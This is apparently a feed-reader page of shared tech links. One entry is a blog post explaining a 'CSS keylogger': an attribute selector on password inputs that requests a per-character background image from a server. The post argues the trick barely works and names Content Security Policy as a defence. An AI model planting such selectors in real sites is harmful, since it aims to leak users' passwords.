1310 stories
·
1 follower

I don’t understand Graph Theory.

1 Share

Comments

Read the whole story
emrox
3 days ago
reply
Hamburg, Germany
Share this story
Delete

CSS Keylogger (and why you shouldn’t worry about it)

1 Share

Leveraging CSS attribute selectors it – in theory – is possible to write a pure CSS keylogger. The selector below for example targets all whose last character is an a:

input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}

The theory goes that whenever a user presses the a character inside an inputs[type="password"], a request to http://localhost:3000/a will be made, thus leaving a breadcrumb trail in some server log for an admin to snoop. Duplicate the selector above for all possible characters, and you’ll see the password appear in your server logs per keystroke.

I see many people on Twitter freaking out because of this (what if it’s in a WordPress Theme you’ve installed?!), yet I don’t really worry about it as in practice this doesn’t work at all (tested with latest Firefox and Chrome on macOS):

  1. It only works with an initial value being set on an input, and not per key press nor after blurring the field.
  2. (Following up on 1) It will only catch the last character of a password when its being prefilled in the value attribute.
  3. It’s not triggered for values that have been autocompleted by the browser’s credentials manager / your password manager of choice.
  4. It can’t handle repeat characters, as the browser won’t re-request the background image in that case.

Above that you can easily prevent it by setting the proper Content Security Policy.

As you were soldiers, carry on …

Read the whole story
emrox
4 days ago
reply
Hamburg, Germany
Share this story
Delete

Double Shot #2038

1 Comment and 2 Shares

Read the whole story
emrox
4 days ago
reply
'Running a modern infrastructure on Kubernetes' sounds interesting
Hamburg, Germany
alvinashcraft
4 days ago
reply
West Grove, PA
Share this story
Delete

Handling Phone Numbers: Best Practices for Developers (2015)

1 Share

Comments

Read the whole story
emrox
5 days ago
reply
Hamburg, Germany
Share this story
Delete

Why OpenStreetMap is in Serious Trouble

2 Comments and 3 Shares

Comments

Read the whole story
tante
8 days ago
reply
In-Depth analysis of the problems OpenStreetMap needs to address to stay relevant.

This is crucial: There needs to be open and free geo data.
Oldenburg/Germany
emrox
6 days ago
reply
Hamburg, Germany
Share this story
Delete
1 public comment
JimB
6 days ago
reply
Very sad but true. The difficulty of search, the single layer, the lack of consistency in adding or editing any feature strike chords. I'd add the plethora of notes from people with good intentions who can't or won't edit, that end up obscuring otherwise valid information.

The method JIT compiler for Ruby 2.6

1 Share

Comments

Read the whole story
emrox
6 days ago
reply
Hamburg, Germany
Share this story
Delete
Next Page of Stories